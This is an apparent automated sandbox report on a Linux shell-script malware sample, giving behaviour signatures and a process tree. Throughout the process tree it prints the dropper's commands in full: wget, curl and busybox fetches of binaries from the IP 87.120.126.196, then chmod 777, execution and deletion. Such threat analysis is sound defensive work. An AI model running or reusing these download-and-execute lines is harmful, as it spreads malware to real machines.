Analysis Overview
SHA256
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760
Threat Level: Shows suspicious behavior
The file 2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 01:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 01:17
Reported
2024-10-25 01:20
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
28s
Max time network
132s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | N/A |
| N/A | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | N/A |
| N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | N/A |
| N/A | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | N/A |
| N/A | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | N/A |
| N/A | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | N/A |
| N/A | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | N/A |
| N/A | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | N/A |
| N/A | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | N/A |
| N/A | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | N/A |
| N/A | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | N/A |
| N/A | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | N/A |
| N/A | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | N/A |
| N/A | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | N/A |
| N/A | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | N/A |
| N/A | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | N/A |
| N/A | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | N/A |
| N/A | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | N/A |
| N/A | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | N/A |
| N/A | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | N/A |
| N/A | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | N/A |
| N/A | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | N/A |
| N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | N/A |
| N/A | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | N/A |
| N/A | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | N/A |
| N/A | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /usr/bin/curl | N/A |
Processes
/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/chmod
[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/rm
[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/wget
[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/chmod
[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/rm
[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/wget
[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/chmod
[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/rm
[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/chmod
[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/rm
[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/wget
[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/chmod
[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/rm
[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/wget
[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/chmod
[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/rm
[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/wget
[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/chmod
[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/rm
[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/wget
[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/chmod
[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/rm
[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/chmod
[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/rm
[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/wget
[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/chmod
[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/rm
[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/wget
[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/chmod
[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/rm
[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/wget
[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/chmod
[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/rm
[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/wget
[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/chmod
[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/rm
[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/wget
[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/chmod
[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/rm
[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/wget
[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
